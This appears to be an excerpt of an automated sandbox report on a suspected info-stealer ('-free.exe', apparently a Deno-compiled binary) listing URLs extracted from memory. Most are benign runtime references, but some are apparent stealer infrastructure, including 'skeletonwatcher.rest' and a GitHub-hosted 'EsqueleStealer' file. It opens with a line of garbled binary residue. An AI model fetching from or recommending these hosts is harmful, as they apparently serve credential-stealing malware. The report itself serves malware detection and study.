6cdXmob.\[^!0(r"UZy-`8|f3#r|JWl(@:w3H0I]DJ-#T-*KAz*.<A8P?t=qh(l#Hy6IpCV+>HBRi&i+at&a>hAX-".^n`^B'3:1/qN
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bjoern.hoehrmann.de/utf-8/decoder/dfa/
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: http://man7.org/linux/man-pages/man2/shutdown.2.html
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: http://my.json.host/data.json
      Source: powershell.exe, 00000003.00000002.2259938507.00000254C8F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2259938507.00000254C8DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2316832920.000001C3901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2316832920.000001C390072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000007.00000002.2268510659.000001C380233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000003.00000002.2234723049.00000254B8D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2268510659.000001C380006000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000002.2359610362.000001638FC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skeletonwatcher.rest/api/get/free
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2354926565.000001639157A000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000002.2360169025.000001639157A000.00000004.00000020.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2357338443.000001639157A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://skeletonwatcher.rest/api/get/free6
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2356660926.0000019908702000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://skeletonwatcher.rest/api/get/freeM
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: powershell.exe, 00000007.00000002.2268510659.000001C380233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
      Source: powershell.exe, 00000003.00000002.2234723049.00000254B8D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2268510659.000001C380006000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#console-namespace
      Source: powershell.exe, 00000007.00000002.2316832920.000001C390072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000007.00000002.2316832920.000001C390072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000007.00000002.2316832920.000001C390072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF6773EE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://crbug.com/v8/8520
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF6773EE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://crbug.com/v8/8520turbo_fast_api_callsenable
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://deno.land/favicon.icodevtools://devtools/bundled/inspector.html?v8only=true&ws=
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/manual
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/manual/linking_to_external_code/import_maps
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/manual/runtime/compiler_apis#denobundle).
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std/
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std/examples/cat.ts
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std/examples/colors.ts
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std/examples/colors.tsGenerate
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std/examples/welcome.ts
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std/fmt/colors.ts
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std/fs/utils.ts
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std/http/file_server.ts
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/std/testing/asserts.ts
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/x/
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://deno.land/x/example/types.d.ts
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deno.land:80
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/)
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/WorkerGlobalScope)
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Compile
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Global)
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Instanc
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/LinkErr
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Memory)
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Module)
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Runtime
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Table)
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/compile
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/instant
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/validat
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://dl.deno.land/canary-latest.txt
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://dl.deno.land/canary/
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://dl.deno.land/canary/P
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#concept-event-listener-inner-invoke
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#concept-event-listener-invoke
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#concept-event-path-append
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#concept-shadow-including-inclusive-ancestor
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#event-path
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#get-the-parent
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#retarget
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#body-mixin
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#concept-construct-readablestream
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#concept-filtered-response-basic
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000002.2360315901.00000163915A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#concept-heade
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#concept-headers-append
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#concept-headers-fill
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#concept-network-error
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#cors-safelisted-response-header-name
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#dom-headers
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#forbidden-response-header-name
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#ref-for-dom-body-formdata
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://github.com/Microsoft/TypeScript/issues/2577)
      Source: powershell.exe, 00000007.00000002.2268510659.000001C380233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://github.com/WICG/import-maps#the-import-mapSet
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/beatgammit/base64-js
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/beatgammit/base64-js/issues/42
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/bitinn/node-fetch/blob/master/src/headers.js
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/chalk/ansi-regex/blob/2b56fb0c7a07108e5b54241e8faec160d393aedb/index.js
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/clap-rs/clap/issues
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://github.com/ctz/webpki-roots
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://github.com/denoland/deno/issues
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/denoland/deno/issues/4591)
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://github.com/denoland/deno/releases
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://github.com/denoland/deno/tree/master/test_plugin
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/github/fetch/blob/master/fetch.js
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/golang/go/blob/master/LICENSE
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/inexorabletash/text-encoding
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2340032549.0000019908502000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247169138.0000019908502000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247371351.0000019908502000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2356439385.0000019908502000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF676CE0000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/v8/v8/blob/24886f2d1c565287d33d71e4109a53bf0b54b75c/LICENSE.v8
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/vadimg/js_bintrees.
      Source: powershell.exe, 00000003.00000002.2234723049.00000254B99B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2268510659.000001C380C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://golang.org/pkg/bytes/#Buffer).
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://golang.org/pkg/bytes/#Buffer.Grow).
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://golang.org/pkg/bytes/#Buffer.ReadFrom).
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.00000199081C2000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://golang.org/pkg/io/#pkg-constants
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://myserver.com
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://no-color.org/
      Source: powershell.exe, 00000003.00000002.2259938507.00000254C8F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2259938507.00000254C8DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2316832920.000001C3901B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2316832920.000001C390072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2354239815.000001638FCCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/EsqueleStealer/EsqueleStealer-D-/main/estl.txt
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2246660024.0000019908482000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/EsqueleStealer/EsqueleStealer-D-/main/estl.txt):
      Source: dGhlYXB0Z3JvdXA=-free.exeString found in binary or memory: https://some/file.ts
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://streams.spec.whatwg.org/
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355932252.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048582469.0000019908182000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2046#section-5.1
      Source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2339846585.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2247637860.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2355853565.0000019908102000.00000004.00001000.00020000.00000000.sdmp, dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000003.2048886641.00000163915C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#idna
